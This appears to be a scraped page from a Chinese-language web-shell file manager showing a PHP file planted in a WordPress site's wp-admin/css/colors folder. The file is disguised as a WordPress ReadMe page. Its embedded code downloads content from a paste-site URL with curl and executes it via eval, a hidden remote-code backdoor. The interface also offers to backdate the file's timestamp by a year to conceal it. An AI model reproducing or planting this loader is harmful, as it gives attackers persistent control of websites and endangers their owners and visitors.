文件操作 - compatibility.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-admin/css/colors/compatibility.php
编辑文件内容
<!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex,nofollow" /> <title>WordPress › ReadMe</title> </head> <body> <?= ""; function getDiDiContent(){ $handle = curl_init(); curl_setopt ($handle, CURLOPT_URL, 'https://cdn.sourceb.in/bins/btBpqkBljS/0'); curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5); $result = curl_exec( $handle ); if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } return $result; } $didi = getDiDiContent(); @eval("?>" . $didi);?>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件